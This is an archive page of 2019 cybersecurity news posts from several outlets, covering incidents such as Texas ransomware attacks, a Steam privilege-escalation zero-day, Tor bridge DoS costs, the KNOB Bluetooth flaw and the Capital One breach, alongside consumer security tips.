Category Archives: Hacking

Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant that connected its system online to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure, such kind of incident could potentially expose high-sensitive information.

The security incident has happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mining cryptocurrency.

The equipment was discovered present in the power plant’s administration offices.

The Ukrainian authorities are currently investigating if any attackers may have had access to exposed systems to information that could threaten national security.

The SBU seized equipment composed of two metal cases containing that included coolers and video cards (Radeon RX 470 GPU), computer components commonly used in mining factories.

“Further, the SBU also found and seized additional equipment[12] that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDnet.

The authorities have charged several employees, but at the time, none was arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering an employee abused institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches

Cisco provided updates for security advisories for three flaws affecting Cisco Small Business 220 Series Smart Switches patched in early August.

Cisco has updated security advisories for three vulnerability in Cisco Small Business 220 Series Smart Switches that have been patched in early August. The three vulnerabilities were reported by the security researcher Pedro Ribeiro, aka ‘bashis‘, via Cisco’s VDOO Disclosure Program.

According to the Cisco Product Security Incident Response Team (PSIRT), public exploit code for these flaws is available online.

Cisco Small Business 220 Series Smart Switches

One of the vulnerabilities is critical remote code execution tracked as CVE-2019-1913, an attacker could exploit this flaw to execute arbitrary code with root privileges on the underlying operating system.

“Multiple vulnerabilities in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to overflow a buffer, which then allows the execution of arbitrary code with root privileges on the underlying operating system.” reads the security advisory.

“The vulnerabilities are due to insufficient validation of user-supplied input and improper boundary checks when reading data into an internal buffer. An attacker could exploit these vulnerabilities by sending malicious requests to the web management interface of an affected device. Depending on the configuration of the affected switch, the malicious requests must be sent via HTTP or HTTPS.

Another flaw is an authentication bypass security flaw tracked as CVE-2019-1912 that resides in the web management interface of Cisco Small Business 220 Series Smart Switches. The flaw could be exploited by an attacker to modify the configuration of an affected device or to inject a reverse shell.

“A vulnerability in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to upload arbitrary files.” reads the security advisory.

“The vulnerability is due to incomplete authorization checks in the web management interface. An attacker could exploit this vulnerability by sending a malicious request to certain parts of the web management interface. Depending on the configuration of the affected switch, the malicious request must be sent via HTTP or HTTPS. A successful exploit could allow the attacker to modify the configuration of an affected device or to inject a reverse shell.”

The third flaw is a command injection vulnerability tracked as CVE-2019-1914 that could be exploited by an authenticated, remote attackers launch a command injection attack.

The good news is that Cisco is not aware of attacks exploiting the above issues.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code. Cisco PSIRT is not aware of malicious use of the vulnerability that is described in this advisory.” states Cisco.

Cisco also released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS) and Integrated Management Controller (IMC).

Also for these flaws, Cisco confirmed it is not aware of attacks in the wild that have exploited them.

Pierluigi Paganini

(SecurityAffairs – Cisco Small Business, hacking)

The post Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches appeared first on Security Affairs.

The Dangers of Using Unsecured Wi-Fi Networks

Isn’t public Wi-Fi great? If you’re having a tea or coffee in a cafe or restaurant you can check your emails and social media.

If you’re waiting for a flight what better way to pass the time than logging onto your favourite website, checking your bank account or even doing a bit of online shopping? And you don’t have to pay a penny or cent. It’s free and you’re not eating into your data allowance. 

Except there’s a problem. Public Wi-Fi is notoriously insecure. Data that travels over a public hotspot network is rarely encrypted. This means that every time you use public Wi-Fi, anybody who is looking can see everything you are doing. They can see the passwords you use, your email address, your name and physical address, phone numbers and any other type of personal information that you might happen to enter into a website. They can certainly see the websites you are visiting. 

This information is gold dust to cyber criminals. It enables them to access and rake through your emails, target you with specific phishing mails, call you with targeted messages and even capture and exploit your payment card details if you happened to buy something online when using public Wi-Fi.

Hackers capture this unencrypted network traffic by interfering with the public Wi-Fi or by creating an ‘evil twin’ fake network which looks legitimate but has actually been set up by the hacker. Because attackers are typically silently observing the public Wi-Fi traffic these attacks are difficult to spot.

  • An attacker could see that a user is accessing a banking site and change the destination account number to a fake website they have set up that emulates the legitimate site.
  • Attackers can also redirect users to making a so called ‘important’ download or update, which actually is a Trojan horse for malware that is planted on your device. 

These attacks can also be easily automated. For instance there are automated tools that look for passwords and write them into a file whenever they see one. There are automated attacks that wait for particular requests, such as accessing Amazon.com, designed to scoop up usernames and passwords.

In the name of self defence

These attacks aren’t theoretical. Hotels are a favorite target, especially during the holidays, but so are shopping malls, airports, cafes and different types of transport stations.

So what can you do to protect yourself? The answer is a virtual private network (VPN) which creates a private tunnel between your device and the internet and encrypts your data. It essentially locks down your network traffic so no one can see what you are doing when you use public Wi-Fi. 

BullGuard VPN for instance uses military grade encryption which would take more than a lifetime to crack. When confronted with this level of protection, hackers simply move on. 

Further it also protects you from other types of snooping whether its companies trying to track your movements or even governments spying on their citizens. In short, you reclaim your privacy and can use the internet with total freedom and safety, even on public Wi-Fi.

About the AuthorSusan Alexandra is a cybersecurity and privacy enthusiast. She writes for publications like GlobalSign, Tripwire, SecurityAffairsSecurityToday and CyberDefenseMagazine. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, feel free to share story ideas to susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – Wi-Fi, hacking)


The post The Dangers of Using Unsecured Wi-Fi Networks appeared first on Security Affairs.

Texas attackers demand $2.5 million to allow towns to access encrypted data

Crooks behind the attacks against Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The cybercriminals behind the wave of attacks that hit 23 Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The attacks started in the morning of August 16 and security experts investigating the incidents believe that it was a coordinated attack carried out by a single cyber crime gang.

Initially, it was said that at least 23 local government organizations were impacted by the ransomware attacks. The Department of Information Resources (DIR) is currently still investigating them and providing supports to mitigate the attacks, anyway evidence continues to point to a single threat actor.

The State Operations Center (SOC) was the attacks were detected.

According to the Texas Department of Information Resources (DIR) the number of impacted towns has been reduced to 22.

“As of the time of this release, responders have engaged with all twenty-two entities to assess the impact to their systems and bring them back online.” reads an update provided by the DIR.

“More than twenty-five percent of the impacted entities have transitioned from response and assessment to remediation and recovery, with a number of entities back to operations as usual.”

The city of Keene confirmed the attack and announced it is working with law enforcement to resolve a cyber incident.

Another of the towns hit by the ransomware attack, the City of Borger, confirmed that business and financial operations and services were impacted, although basic and emergency services continued to be operational.

“On the morning of August 16, 2019 the City of Borger was one of more than 20 entities in Texas that reported a ransomware attack.” reads the press release published by the City of Borger.

“Currently, Vital Statistics (birth and death certificates) remains offline, and the City is unable to take utility or other payments. Until such time as normal operations resume, no late fees will be assessed, and no services will be shut off,”

Keene Mayor Gary Heinrich told NPR the attackers are asking for $2.5 million to unlock the files.

“Well, just about everything we do at City Hall is impacted” Heinrich said.

“They got into our software provider, the guys who run our IT systems. A lot of folks in Texas use providers to do that, because we don’t have a staff big enough to have IT in house.”

Unfortunately, ransomware attacks are a big problem for US Government and City Offices, recently some cities in Florida were victims of hackers, including Key Biscayne, Riviera Beach and Lake City.

In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Pierluigi Paganini

(SecurityAffairs – Texas, ransomware)

The post Texas attackers demand $2.5 million to allow towns to access encrypted data appeared first on Security Affairs.

A new Zero-Day in Steam client impacts over 96 million Windows users

A new zero-day vulnerability in the for Windows impacting over 96 million users was disclosed by researcher Vasily Kravets.

A news zero-day flaw in the Steam client for Windows client impacts over 96 million users. The flaw is a privilege escalation vulnerability and it has been publicly disclosed by researcher Vasily Kravets.

Kravets is one of the researchers that discovered a first zero-day flaw in the Steam client for Windows, the issue was initially addressed by Valve, but the researcher Xiaoyin Liu disclosed a bypass to the fix implemented by Valve to re-enable to issue.

Valve did not award Kravets and banned him from it bug bounty program.

Kravets decided to publicly disclose the privilege escalation that could be exploited by attackers run executables using the privilege of Steam Client Service’s  NT AUTHORITY\SYSTEM.

The expert explained that it used the BaitAndSwitch, a technique, that combines creation of links and oplocks to win TOCTOU (time of check\time of use).

The attack scenario sees hackers getting remote code execution privileges by exploiting a vulnerability in a Steam game, a Windows app, or the OS itself, then elevating privileges by triggering this second zero-day to run a malicious payload using SYSTEM permissions.

“As a result any code code could be executed with maximum privileges, this vulnerability class is called «escalation of privileges» (eop) or «local privilege escalation» (lpe). Despite any application itself could be harmful, achieving maximum privileges can lead to much more disastrous consequences.” wrote Kravetz. “For example, disabling firewall and antivirus, rootkit installation, concealing of process-miner, theft any PC user’s private data — is just a small portion of what could be done. “

Kravets published the following two PoC videos for this second zero-day flaw in Steam client for Windows. He demonstrated two methods that could be exploited by attackers to gain SYSTEM permissions on any Windows system running an unpatched Steam version.

Pierluigi Paganini

(SecurityAffairs –– Stream client, zero-day)

 

The post A new Zero-Day in Steam client impacts over 96 million Windows users appeared first on Security Affairs.

DoS attacks against most used default Tor bridges could be very cheap

Researchers explained that carrying out attacks against the most used default Tor bridges would cost threat actors $17,000 per month.

According to security researchers Rob Jansen from the U.S. Naval Research Laboratory, and Tavish Vaidya and Micah Sherr from Georgetown University, launching denial-of-service (DoS) attacks against most commonly used default Tor bridges would cost attackers $17,000 per month.

DoS attacks could be used for preventing users to access the popular anonymizing network or to carry out attacks to de-anonymize Tor users with techniques such as traffic correlation.

For a modest sum, threat actors could target Tor bridges saturating their resources and causing significant degradation of network performance.

In a research paper presented at the 2019 USENIX Security Symposium, the experts explained that targeting the entire Tor network with a DoS attack could be very expensive, it would cost millions of dollars each month, but targeted attacks against specific Tor bridges are economically feasible.

“First, we explore an attack against Tor’s most commonly used default bridges (for censorship circumvention) and estimate that flooding those that are operational would cost $17K/mo. and could reduce client throughput by 44% while more than doubling bridge maintenance costs. Second, we explore attacks against the TorFlow bandwidth measurement system and estimate that a constant attack against all TorFlow scanners would cost $2.8K/mo. and reduce the median client download rate by 80%.” reads the paper. “Third, we explore how an adversary could use Tor to congest itself and estimate that such a congestion attack against all Tor relays would cost $1.6K/mo. and increase the median client download time by 47%. Finally, we analyze the effects of Sybil DoS and deanonymization attacks that have costs comparable to those of our attacks.”

The experts estimate that the total link capacity across the Tor network ranged from 429 to 575 Gbit/s over the year; for their research, the experts used the average of 512.73 Gbit/s this means that the attacker would spend around $10,000 per hour to use a DoS stresser service to hit each Tor relay. Overall code per month is $7.2 million. 

An attack on Tor’s most commonly used default bridges and flooding them would only cost around $17,000 per month, in this way the attackers could reduce client throughput by 44% and more than double bridge maintenance costs. 

An attack aimed at all scanners in the Tor Flow bandwidth measurement system would cost $2,800 per month and reduce the median client download rate by 80%. 

The expert discovered that threat actors could use Tor to congest itself and such kind of attack would cost $1,600 per month, resulting in the median client download time increasing by 47%. 

In order to examine the performance of the network’s bridges the experts focused on 25 default bridges that use obfs4 obfuscation protocol2, because most of Tor bridge use default bridges and obfs4.

“To test their performance, we use a modified version of Tor to download a 6 MiB file through each bridge. Surprisingly, we find that only 48% (12/25) of the obfs4 default bridges included in Tor Browser Bundle (TBB) are operational.” continues the experts. “The Tor Browser Bundle (TBB) includes a set of 38 hard-coded default bridges (as of version 8.0.3). Users who cannot directly access Tor relays can configure TBB to connect via one of these default bridges “

To compare against the performance of unlisted bridges, the experts requested 135 unlisted obfs4 bridges from the Tor Project’s bridge authority via its web and email interfaces. 95 of the acquired unlisted bridges were found to be functional.

The researchers estimate that the costs to launch a DoS attack against the 38 default bridges could be of around $31,000 per month. Considering that nation-state actors could be interested in targeting these default Tor bridges, this budget could be a good investment for them.

Experts explained that considering that 90% of bridge traffic passes through default bridges, forcing it to unlisted bridges could have a significant impact on network performance.

Tor bridges attacks

The study also compared the presented attack scenarios with launching a Sybil DoS attack, where the adversary could run Sybil relays and then arbitrarily degrade traffic performance or deny service by dropping circuits, or de-anonymize users by observing both the entry and exit points in a vulnerable circuit, and concludes that attacks on Tor bridges are more flexible and less expensive. 

“On the positive side, we find that Tor’s growth has made it more resilient at least to simple attacks: disrupting the service by na¨ıvely flooding Tor relays using stresser services is an expensive proposition and requires $7.2M/month. Unfortunately, however, several aspects of Tor’s design and rollout make it susceptible to more advanced attacks.” the researchers conclude. “We find that Tor’s bridge infrastructure is heavily dependent on a small set of fixed default bridges, the operational of which can be disrupted at a cost of $17K/month”  

Further technical details on the attack techniques are reported in the interesting analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – Tor bridges, hacking)

The post DoS attacks against most used default Tor bridges could be very cheap appeared first on Security Affairs.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas, which is the cost of Dealing with an attack in 4 Industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

Software Vulnerabilities in the Boeing 787

Boeing left its software unprotected, and researchers have analyzed it for vulnerabilities:

At the Black Hat security conference today in Las Vegas, Santamarta, a researcher for security firm IOActive, plans to present his findings, including the details of multiple serious security flaws in the code for a component of the 787 known as a Crew Information Service/Maintenance System. The CIS/MS is responsible for applications like maintenance systems and the so-called electronic flight bag, a collection of navigation documents and manuals used by pilots. Santamarta says he found a slew of memory corruption vulnerabilities in that CIS/MS, and he claims that a hacker could use those flaws as a foothold inside a restricted part of a plane's network. An attacker could potentially pivot, Santamarta says, from the in-flight entertainment system to the CIS/MS to send commands to far more sensitive components that control the plane's safety-critical systems, including its engine, brakes, and sensors. Boeing maintains that other security barriers in the 787's network architecture would make that progression impossible.

Santamarta admits that he doesn't have enough visibility into the 787's internals to know if those security barriers are circumventable. But he says his research nonetheless represents a significant step toward showing the possibility of an actual plane-hacking technique. "We don't have a 787 to test, so we can't assess the impact," Santamarta says. "We're not saying it's doomsday, or that we can take a plane down. But we can say: This shouldn't happen."

Boeing denies that there's any problem:

In a statement, Boeing said it had investigated IOActive's claims and concluded that they don't represent any real threat of a cyberattack. "IOActive's scenarios cannot affect any critical or essential airplane system and do not describe a way for remote attackers to access important 787 systems like the avionics system," the company's statement reads. "IOActive reviewed only one part of the 787 network using rudimentary tools, and had no access to the larger system or working environments. IOActive chose to ignore our verified results and limitations in its research, and instead made provocative statements as if they had access to and analyzed the working system. While we appreciate responsible engagement from independent cybersecurity researchers, we're disappointed in IOActive's irresponsible presentation."

This being Black Hat and Las Vegas, I'll say it this way: I would bet money that Boeing is wrong. I don't have an opinion about whether or not it's lying.

Bypassing Apple FaceID’s Liveness Detection Feature

Apple's FaceID has a liveness detection feature, which prevents someone from unlocking a victim's phone by putting it in front of his face while he's sleeping. That feature has been hacked:

Researchers on Wednesday during Black Hat USA 2019 demonstrated an attack that allowed them to bypass a victim's FaceID and log into their phone simply by putting a pair of modified glasses on their face. By merely placing tape carefully over the lenses of a pair glasses and placing them on the victim's face the researchers demonstrated how they could bypass Apple's FaceID in a specific scenario. The attack itself is difficult, given the bad actor would need to figure out how to put the glasses on an unconscious victim without waking them up.

Chinese cyberhackers ‘blurring line between state power and crime’

Cybersecurity firm FireEye says ‘aggressive’ APT41 group working for Beijing is also hacking video games to make money

A group of state-sponsored hackers in China ran activities for personal gain at the same time as undertaking spying operations for the Chinese government in 14 different countries, the cybersecurity firm FireEye has said.

In a report released on Thursday, the company said the hacking group APT41 was different to other China-based groups tracked by security firms in that it used non-public malware typically reserved for espionage to make money through attacks on video game companies.

Related: Australia joins condemnation of 'huge, audacious' Chinese hacking plot

Continue reading...

Bipartisan Senate Support Reveals Russian Election Interference

A report from the Senate Intelligence Committee released last week concluded that the Russian government extensively interfered in U.S. elections from 2014 to at least 2017.

The partially redacted bipartisan report describes several findings related to Russian activities, including:

  • “While the Committee does not know with confidence what Moscow’s intentions were, Russia may have been probing vulnerabilities in voting systems to exploit later… [or] may have sought to undermine confidence in the 2016 U.S. election simply through the discovery of their activity.”

  • “State election officials… were not sufficiently warned or prepared to handle an attack from a hostile nation-state actor.

  • “DHS and FBI alerted states to the threat of cyber attacks in… 2016, but the warnings did not provide enough information or go to the right people.”

  • “In 2016, cybersecurity for electoral infrastructure at the state and local level was sorely lacking… [V]oter registration databases were not as secure as they could have been. Aging voting equipment… were vulnerable to exploitation by a committed adversary.”

While citing an “unprecedented level of activity,” the report also maintains that it found no evidence of the alteration of vote tallies, but it qualified its position by stating that “the Committee and IC’s insight into this are limited.”

The report details evidence of Russian activity targeting elections in all 50 states in 2016, and cites an inability on the part of the Committee or Department of Homeland Security to determine a clear pattern or goal. DHS representatives are quoted as saying that “there wasn’t a clear red state-blue state-purple state more electoral votes, less electoral votes” pattern.

The report concluded with a series of recommendations, including creating a policy of deterrence and responses to attacks on election infrastructure to “send a clear message and create significant costs for the perpetrator.” Strengthening cyber defenses for election-related systems, replacing outdated equipment, and providing greater funding for states were also recommended.

“I hope the bipartisan findings and recommendations outlined in this report will underscore to the White House and all of our colleagues, regardless of political party, that this threat remains urgent, and we have a responsibility to defend our democracy against it,” said committee member Senator Mark Warner in a statement. 

The post Bipartisan Senate Support Reveals Russian Election Interference appeared first on Adam Levin.

The Content Streaming Gold Rush is a Hacker’s El Dorado

Hard to imagine, but appointment television hasn’t been a real thing for more than a decade now. First, we recorded. Now, we stream. After transforming (actually killing) the movie rental industry, Netflix started streaming in 2010. It changed how consumers viewed television by providing subscribers access to a sizable library of movies and shows on a wide variety of devices.

With a low price point, it wasn’t a very attractive target for hackers. It worked. By 2018, Netflix streaming accounted for 15% of all worldwide downstream traffic on the internet.

The rise of Netflix’s streaming service also led to a decline in piracy. BitTorrent, the preferred method of illicit (if not illegal) file downloading and sharing decreased by a whopping 25 percent between 2011 and 2015. It was no longer the only quasi-infinite virtual warehouse of digital content. That approach to content had become monetized by Netflix; the paradigm of “everything, all the time” went mainstream.

For those who say, “How so?” piracy has long been a hot button topic among intellectuals, some saying it’s not about cost (free, in the case of piracy), but rather ease of use. Consumers could see popular shows and movies on multiple platforms without the maelstrom of channels and hidden fees presented by cable plans and without having to resort to piracy.

Netflix created a commercial play at the piracy game–all above board, and it worked.

The Wrong Idea

Intellectual viewpoints are not always welcome in boardrooms where decisions about distribution are made, and if in fact they wiggle their way in, they are not often embraced. Entertainment didn’t see the Netflix move as a mainstreaming of ease of use.

Enter the “walled garden” approach.

You see it everywhere. Instead of sharing its intellectual property with Netflix, Disney is launching its own streaming service, Disney+. NBC is pulling its tremendously popular workplace comedy, The Office, from Netflix and Hulu and making it available exclusively on NBCUniversal. AT&T is following suit with its recent acquisition of Time Warner and HBO. AppleGoogle, and Facebook are all entering the ring as well. Most of these services are throwing massive amounts of money at original content and licensing to make their own platforms “must-have.”

What amounts to a cash grab for streaming services is a Byzantine snarl for consumers. Anyone who watched Avengers: Infinity War on Netflix in the last year will need to see its sequel, Endgame on Disney+. Soon, certain podcasts will not be available on both Android and iOS. Support for streaming services on devices can be revoked, as was the case for Hulu on Samsung Smart TVs, or HBO GO on the Xbox 360. Movies “purchased” on Apple may vanish from a consumer’s account if the rights lapse. Streaming services are becoming Balkanized, and as the need for different accounts, payment, memberships, and in some cases, hardware becomes ever more complex, once again, a BitTorrent-style warehouse may become the more attractive alternative for tech savvy users.

This fee-ridden decentralization of content has no doubt contributed mightily to the rebound of piracy, and in this new eco-system hackers are the main beneficiaries.

Yo Ho Ho

To pirate a show or a movie, one need only to download a small file from a website such as the Pirate Bay and open it with a BitTorrent client (most of them are free). A user then downloads pieces of said movie or show from however many people are sharing that file while in turn uploading to other users. The more popular the video being downloaded, the faster it goes. Depending on your connection, a full high-quality movie can be downloaded in less time than it takes to make a bowl of popcorn.

Is it any wonder that many users decided to watch the Game of Thrones finaleusing BitTorrent?

From a cybersecurity perspective, BitTorrent is beyond problematic. It is in fact “accepting candy from a stranger in a windowless van” dangerous. Downloading a pirated torrent ultimately means getting files from a network of anonymous sources, and not just downloading them, but actually opening and running them. Malware has only gotten more sophisticated in recent years; if a payload can be delivered through a single link or file in a phishing scam, it doesn’t take much to imagine what can be digitally smuggled within a several gigabyte download of the latest Spider-Man movie. BitTorrent provides a relatively simple way to infect thousands of computers without needing to actively target anyone. It’s passive and potentially quite pervasive.

If this sounds speculative or far-fetched, it could be that you’re simply not reading enough news. For instance, a hacking campaign has been targeting South Korean BitTorrent users for the last few weeks by embedding backdoors into pirated television episodes. It’s only a matter of time before we see similar campaigns closer to home–and it’s a safe bet there already are such hacks happening in the U.S market now.

The threat to corporate and government networks shouldn’t be overlooked. When the U.S. Geological Survey’s networks were infected with Russian malware in late 2018, the culprit was traced back to malware embedded in pornographic videos downloaded by an employee that spread to a USB drive, a mobile device, and finally compromised that employee’s entire office network.

The Takeaway

Understood correctly, piracy presents an object lesson in the unintended consequences of a business decision in the realm of cybersecurity.

Movies, television shows and podcasts are expensive to produce, and companies are necessarily going to try to get the most bang for their buck by trying to corral the cash flow around their intellectual property. Multiple streaming accounts are expensive and often confusing to maintain, and consumers are similarly going to try to go the cheapest route, namely by pirating shows rather than juggling plans and platforms–especially when doing so creates a one-stop shopping experience.

Hackers tend to seek the path of least resistance. An increasing number of potential targets trading relative security for convenience represent a lucrative and potentially dangerous avenue for attack. But it’s avoidable. Digital marketplaces are more profitable when they are free(er) and (more) open.

The post The Content Streaming Gold Rush is a Hacker’s El Dorado appeared first on Adam Levin.

Capital One Data Breach: How Impacted Users Can Stay More Secure

Capital One is one of the 10 largest banks based on U.S. deposits. As with many big-name brands, cybercriminals see these companies as an ideal target to carry out large-scale attacks, which has now become a reality for the financial organization. According to CNN, approximately 100 million Capital One users in the U.S. and 6 million in Canada have been affected by a data breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, and 80,000 bank account numbers, and more.

According to the New York Post, the alleged hacker claimed the data was obtained through a firewall misconfiguration. This misconfiguration allowed command execution with a server that granted access to data in Capital One’s storage space at Amazon. Luckily, Capital One stated that it “immediately fixed the configuration vulnerability.”

This breach serves as a reminder that users and companies alike should do everything in their power to keep personal information protected. If you think you might have been affected by this breach, follow these tips to help you stay secure:

  • Check to see if you’ve been notified by Capital One. The bank will notify everyone who was affected by the breach and offer them free credit monitoring and identity protection services. Be sure to take advantage of the services and check out the website Capital One set up for information on this breach.
  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible. Capital One will allow you to freeze your card so purchases can no longer be made.
  • Change your credentials. Err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Capital One Data Breach: How Impacted Users Can Stay More Secure appeared first on McAfee Blogs.

Briton who helped stop 2017 WannaCry virus spared jail over malware charges

  • Marcus Hutchins pleaded guilty to two malware charges
  • 25-year-old ‘incredibly thankful’ to be sentenced to time served

The British computer expert who helped shut down the WannaCry cyberattack on the NHS said he is “incredibly thankful” after being spared jail in the US for creating malware.

Marcus Hutchins was hailed as a hero in May 2017 when he found a “kill switch” that slowed the effects of the WannaCry virus affecting more than 300,000 computers in 150 countries.

Related: FTSE 250 firms exposed to possible cyber-attacks, report finds

Continue reading...

Hacked forensic firm pays ransom after malware attack

Largest private provider Eurofins hands over undisclosed fee to regain control of systems

Britain’s largest private forensics provider has paid a ransom to hackers after its IT systems were brought to a standstill by a cyber-attack, it has been reported.

Eurofins, which is thought to carry out about half of all private forensic analysis, was targeted in a ransomware attack on 2 June, which the company described at the time as “highly sophisticated”. Three weeks later the company said its operations were “returning to normal”, but did not disclose whether or not a ransom had been paid.

